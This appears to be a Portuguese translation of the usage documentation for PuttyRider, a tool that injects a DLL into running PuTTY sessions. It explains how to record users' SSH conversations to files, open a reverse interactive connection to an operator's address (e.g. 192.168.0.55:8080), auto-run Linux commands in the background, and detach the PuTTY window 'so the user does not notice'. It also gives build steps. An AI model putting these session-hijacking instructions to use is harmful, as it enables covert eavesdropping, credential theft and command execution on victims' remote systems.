
Sequestrar sessões do Putty para farejar a conversa e injetar comandos Linux.
Sequestre sessões do Putty para farejar conversas e injetar comandos Linux.
Listar processos Putty existentes e seu status (injetado / não injetado)
PuttyRider.exe -l
Injetar DLL no primeiro putty.exe encontrado e iniciar uma conexão reversa da DLL para meu IP:Porta, depois sair do PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Executar em segundo plano e aguardar novos processos Putty. Injetar em qualquer novo putty.exe e gravar todas as conversas em arquivos locais.
PuttyRider.exe -w -f
Ejetar PuttyRider.dll de todos os processos Putty onde já foi injetado. (Não esqueça de matar o PuttyRider.exe se estiver executando em modo -w, caso contrário ele irá reinjetar novamente.)
PuttyRider.exe -x
Modos de operação:
-l Listar os processos Putty em execução e suas conexões
-w Injetar em todas as sessões Putty existentes e aguardar novas sessões
para injetar também
-p PID Injetar apenas na sessão Putty existente identificada pelo PID.
Se PID==0, injetar no primeiro Putty encontrado
-x Limpeza. Remover a DLL de todas as instâncias Putty em execução
-d Modo de depuração. Funciona apenas com o modo -p
-c CMD Executar automaticamente um comando Linux após a injeção bem-sucedida
PuttyRider removerá espaços finais e o caractere '&' do CMD
PuttyRider adicionará: " 1>/dev/null 2>/dev/null &" ao CMD
-h Exibir esta ajuda
Modos de saída:
-f Gravar toda a conversa Putty em um arquivo no diretório local.
O nome do arquivo terá o PID do putty.exe atual anexado
-r IP:PORTA Iniciar uma conexão reversa para a máquina especificada e
iniciar uma sessão interativa.
Comandos interativos (após receber uma conexão reversa):
!status Verificar se a janela Putty está conectada à entrada do usuário
!discon Desconectar a janela Putty principal para que não exiba nada
Isso é útil para enviar comandos sem que o usuário perceba
!recon Reconectar a janela Putty ao seu modo normal de operação
CMD Comandos do shell Linux
!exit Encerrar esta conexão
!help Exibir ajuda para conexão do cliente
Use o Prompt de Comando do Visual Studio:
nmake main dll
Agradecimentos a Brett Moore da Insomnia Security por sua prova de conceito PuttyHijack